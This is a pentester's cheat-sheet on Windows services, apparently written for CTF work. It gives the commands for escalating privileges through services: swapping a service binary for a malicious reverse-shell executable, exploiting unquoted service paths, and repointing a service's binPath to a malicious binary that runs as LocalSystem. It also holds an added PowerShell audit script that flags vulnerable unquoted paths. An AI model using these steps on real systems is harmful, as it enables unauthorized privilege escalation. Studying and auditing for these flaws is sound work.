Windows services

windowsprivesc20 steelmountain

You can learn more about Windows services here.

  • πŸ—ΊοΈ List services
PS> Get-Service
PS> net start
PS> sc.exe query # with infos
  • πŸ”Ž Get more info about a service
PS> sc.exe qc xxx
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: xxx
  [...]
  BINARY_PATH_NAME   : C:\[...]\service.exe
  [...]

🔥 In CTFs, you may be able to start/stop the service manually

PS> sc.exe stop xxx
PS> # do your job
PS> sc.exe start xxx

πŸ€ Notable services: vss, Spooler, wuauserv, etc.

➡️ See also: Potatoes 🥔 and SweetPotato (1.2k ⭐).

➑️ PrintNightmare (CVE-2021-1675) vulnerability in Spooler service.

➡️ Users in the group Server Operators can start/stop some services. They can also edit some services, for example to replace the binary path.


Pentester Notes ☠️

Insecure permissions

The current user may be able to replace the service binary with a malicious executable (e.g. revshell.exe)

PS> icacls C:\[...]\service.exe
PS> move C:\[...]\service.exe C:\[...]\service.exe.old
PS> icacls C:\[...]\malicious.exe /grant Everyone:F

Unquoted Service Path

If the service binary path contains spaces, is not quoted, and the attacker can create files in one of the parent directories, then the attacker can drop an executable that Windows runs in place of the real binary, with the rest of the path passed to it as arguments.

PS> icacls $Env:appdata\Vulnerable Program\service.exe
PS> move C:\[...]\malicious.exe $Env:appdata\Vulnerable.exe
PS> # the service will execute
PS> # $Env:appdata\Vulnerable.exe Program\service.exe
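Added audit script (PowerShell), not from the original notes, that automates the unquoted-path check described above: it lists services whose binary path is unquoted and contains spaces, derives the paths the SCM would try before the real binary, and flags those whose directory lets a broad group create files. Test-BroadWrite and Get-UnquotedServicePath are helper names invented for this example.

```powershell
# Rights that allow creating or replacing a file in a directory
$writeBits   = [System.Security.AccessControl.FileSystemRights] 'CreateFiles, Write, Modify, FullControl'
# Low-privilege groups that should never be able to write into a service's path
$broadGroups = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'

function Test-BroadWrite {
    param([string]$Dir)
    foreach ($ace in (Get-Acl -LiteralPath $Dir).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # ACEs that only propagate to children do not grant file creation in $Dir itself
        if ($ace.PropagationFlags.HasFlag([System.Security.AccessControl.PropagationFlags]::InheritOnly)) { continue }
        if ($broadGroups -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band [int]$writeBits) -ne 0) { return $true }
    }
    return $false
}

function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service |
      Where-Object { $_.PathName -and $_.PathName -notlike '"*' } |
      ForEach-Object {
        $svc = $_
        # Keep only the executable part; arguments after ".exe" do not matter here
        $exe = if ($svc.PathName -match '^(.*?\.exe)') { $Matches[1] } else { $svc.PathName }
        if ($exe -notmatch ' ') { return }
        $parts = $exe -split ' '
        # Each prefix that ends before a space becomes "<prefix>.exe", tried in this order
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            $dir = Split-Path -Parent $candidate
            if (-not (Test-Path -LiteralPath $dir)) { continue }
            [pscustomobject]@{
                Service    = $svc.Name
                RunsAs     = $svc.StartName     # LocalSystem services are the worst case
                ImagePath  = $svc.PathName
                WouldRun   = $candidate
                BroadWrite = Test-BroadWrite $dir
            }
        }
      }
}

Get-UnquotedServicePath | Sort-Object BroadWrite -Descending | Format-Table -AutoSize
```

Any row with BroadWrite set to True is a service to fix by quoting its ImagePath (sc.exe config with a quoted binPath=) or tightening the directory ACL.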

Insecure Service Permissions


This occurs when the current user has permissions to edit the configuration of a service, such as being able to change the location of its binary. Use the accesschk tool to check. If the user is granted SERVICE_ALL_ACCESS on the service, then have fun.

PS> # LocalSystem is the highest privileged account available
PS> sc.exe config xxx binPath= C:\[...]\malicious.exe obj= LocalSystem  # sc.exe needs a space after each "="

πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.

  • It's recommended to use service accounts for services.
  • Most services run with LocalSystem privileges by default.
  • From the SCM, we can configure an application to be executed if a service fails. If one is configured, it can be exploited.